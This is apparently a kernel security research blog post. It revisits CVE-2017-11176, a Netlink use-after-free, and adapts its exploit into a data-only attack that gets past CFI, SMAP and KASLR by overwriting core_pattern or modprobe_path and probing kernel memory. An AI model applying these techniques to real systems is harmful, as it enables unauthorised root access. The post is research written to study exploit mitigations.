Reminder: this blog series explores Control-Flow Integrity (CFI) in the Linux kernel. This is the third post, where we revisit the exploit of an existing CVE. If you lack some context, you can access the other posts here:

  1. LLVM-CFI and the Linux Kernel
  2. From Crash Report to Root Access: Building an End-to-End Data-Only Exploit
  3. Revisiting CVE-2017-7308
  4. Revisiting CVE-2017-11176 (this post)

This post will be similar to the previous one: we’ll take an existing bug with an existing exploit (relying on control-flow hijacking), and we’ll convert it to a data-only exploit to make it work when CFI is on. The chosen exploit targets a vulnerability present in Linux kernels up to version 4.11.9. The bug was originally exploited by Nicolas Fabretti, from LEXFO. I recommend reading his very complete and informative write-up. While the existing exploit ran with SMAP and KASLR disabled, here we assume that both SMAP and KASLR are enabled.

Reminder: SMAP (Supervisor Mode Access Prevention) is a security features that prevents the kernel from accessing data in user-space. Similarly, SMEP prevents user-space code execution from the kernel mode.

Original Exploit

The vulnerability is a use-after-free in Netlink socket management. By racing a reference count on one of the core structures, it’s possible to free an object while it’s still in use. The vulnerable object is struct netlink_sock, a big objects containing a lot of corruption candidates. The original exploits corrupts the following object:

struct netlink_sock {
    (...)
    wait_queue_head_t wait;
    (...)
};

This field is the head of a linked-list, a common kernel data structure for queue management. The list holds elements like:

struct __wait_queue {
    unsigned int flags;
    void *private;
    int (*func) (struct wait_queue_entry *, unsigned, int, void *);
    struct list_head task_list;
};

The third field, func, is a function pointer, and the chosen corruption target. It’s a nice target, as a call to that function is easily triggerable from userspace using a single syscall, and that syscall has low side effects (meaning it only touches a small number of fields). This is very important for the exploit reliability, since the victim object is in corrupted state due to the use-after-free, and accessing garbage data could make the syscall fail early.

Function Pointer Hijack

To hijack control flow, the exploit re-allocates the freed netlink_sock slot with controlled data. This is achieved by quickly running a sendmsg() syscall to heap-spray user-controlled content with a matching allocation size. sendmsg() is normally used to send a message through a socket: it receives a buffer with user-controlled length and content as argument, and the buffer is later copied into a dynamically allocated buffer in kernel-space. Since both the sendmsg() and the netlink_sock allocations go through kmalloc, by sizing the spray buffer precisely, they’re allocated from the same slab cache (if this is not clear, you can read again this write-up as a reminder on the slab allocator inner workings).

The attack steps:

  1. Trigger the bug to (wrongly) free a netlink_sock.
  2. Immediately invoke sendmsg() with a buffer crafted to look like a netlink_sock, but with attacker values in the targeted fields.
  3. Ensure the linked-list head in the new fake netlink_sock points to a wait queue object residing in user-space (possible because SMAP is assumed disabled in the baseline exploit).
  4. When the corrupted list is used, the kernel fetches and uses the attacker-supplied function pointer, allowing full control over execution flow.

The next part of the exploit makes use of return-oriented programming (ROP). The idea is to construct a chain of short instruction sequences, called gadgets, that already exist in the kernel’s code. By carefully chaining these gadgets together, the exploit achieves arbitrary computation without injecting new code. This way, even is SMEP is enabled, the exploit can execute (almost) arbitrary code. In this case, the chain works as follows:

  • It redirects the kernel’s stack pointer (sp) to a malicious fake stack located in user-space memory (controlled by the attacker)

  • Each gadget ends with a return instruction, causing the kernel to pop the next gadget address from the fake stack, effectively chaining execution through these gadgets.

  • The gadgets collectively manipulate control registers, clearing the SMEP bit in the CR4 register. This disables SMEP, allowing execution of user-space code in kernel mode.

  • Finally, the ROP chain jumps to a payload (in user-space memory) that executes commit_creds(prepare_kernel_cred(0)). These kernel functions grant the current process elevated (root) privileges by preparing and committing a new set of credentials with maximum permissions.

Again, CFI would be effective on this attack, as jumping to an arbitrary byte which is not the beginning of a function in the kernel code is not allowed by the Control-Flow Graph. However, we can find other interesting field in the netlink_sock structure to adapt the exploit with a data-only attack.

Data-Only Attack Variant

The idea here is to aim for other fields in the same structure to gain arbitrary write/read access, so we can avoir hijacking control flow. One such field is:

struct netlink_sock {
    struct sock {
        struct hlist_node {
            struct hlist_node *next;
            struct hlist_node **pprev;
        } sk_bind_node;
    } sk;
};

The sk_bind_node field stores the linked-list metadata of an entry. Here, next points to the next entry, and pprev stores a pointer to the previous element’s pointer, meaning we have an entry in a doubly linked list.

By inspecting the source code accessing the victim object’s fields, we see that providing the right parameters to the setsockopt system call (which is used to modify socket parameters, unlike getsockopt which reads them) can trigger the deletion of this node from the linked list.

To simplify list manipulation, note that pprev is not a direct pointer to the previous element but rather a pointer to the location of the previous element’s pointer. The function that removes an element from the list is then implemented as follows:

void hlist_del(struct hlist_node *n)
{
    struct hlist_node *next = n->next;
    struct hlist_node **pprev = n->pprev;

    *pprev = next;
    if (next)
        next->pprev = pprev;
}

Recall that when this function is called on the node, we control the content of the structure pointed to by n, as it is called on the victim object field.

Thus, if we set pprev to an arbitrary kernel address and next to the value we want to write, then when executing *pprev = next; (line 6), the kernel will write our value to the desired memory location.

This list deletion can thus be used as an arbitrary 8-byte write primitive.

Using the Arbitrary Write Primitive

Using this primitive, we can execute the same privilege escalation technique as previously: overwriting the core_pattern symbol.

The string "|tmp/a" fits in 8 bytes (including the terminating character), so one write is enough to overwrite the symbol with a path an unprivileged user has access to.

Converting this string to a pointer gives the value 0x00612F706D747C (note the byte order is reversed due to endianness).

There is a subtlety though: the last instruction in the list deletion procedure executes the assignment next->pprev = pprev (line 8). However, in this case, next is set to the path we want to write, so interpreting this string as a pointer creates an invalid address. Writing here triggers a memory corruption (called a kernel oops) and kills the process since the kernel cannot recover.

To circumvent this, the write is split in two so we can control the upper part of the resulting pointer and choose a memory region mapped in the kernel address space.

For example, instead of writing 0x00612F706D747C at &core_pattern, we write 0xFFFF8800706D747C at &core_pattern and 0xFFFF88000000612F 4 bytes further (&core_pattern + 4).

Each resulting address points inside memory regions mapped by the kernel, so the accesses are legal. While it might overwrite other random data, the chance of corrupting data that crashes the kernel is low.

Another Interesting Target: modprobe_path

Another interesting parameter we can target instead of core_pattern is modprobe_path.

This symbol points to an executable that the kernel runs when dynamically loading modules.

One example usage is when the kernel tries to execute a binary file but does not recognize its binary format using a predefined list (such as ELF format, shebang scripts, etc). In such cases, it calls this executable to load the kernel module that handles the binary format. Aliases of the module names loaded by __request_module are listed in /lib/modules/$(uname -r)/modules.alias. More details about the autoloading process are available here.

In this alternative exploit, after overriding modprobe_path, we can simply launch a dummy executable with an invalid binary format magic number, forcing the kernel to launch our controlled executable.

Bypassing KASLR

We can also bypass KASLR with this vulnerability, using the following field:

struct netlink_sock {
    (...)
    unsigned long *groups;
    (...)
};

This field can be accessed using the getsockname system call, which reads the value at groups[0] and returns it to user space.

By setting groups to a kernel memory address, we can build an arbitrary 8-byte read primitive.

Then, using the same technique as in the previous data-only attack (see Bypassing KASLR), we probe kernel address space to find the offset.

However, note important differences:

  • During the pipe-based attack, probing an invalid address returns an error because the address is user-supplied, preventing the kernel from halting due to bad software.

  • Here, the read happens directly from kernel space, so behavior depends on kernel configuration:

    • If the CONFIG_PANIC_ON_OOPS flag is enabled, the kernel crashes when probing an invalid address, so the KASLR bypass fails.

    • This flag is rarely enabled on major distributions, which prefer to recover from such errors to avoid denial-of-service. In that case, the kernel just kills the process.

To cope with this, before each probe, we fork the current process and execute the read in the child process. If the address is not mapped, the child crashes, and exploitation continues in the main thread.


We now have the full exploits! The sources are available here:

This finishes this series about CFI. I hope you enjoyed it! If you want to continue reading on this topic, here is a collection of links in random order worth checking:

Updated: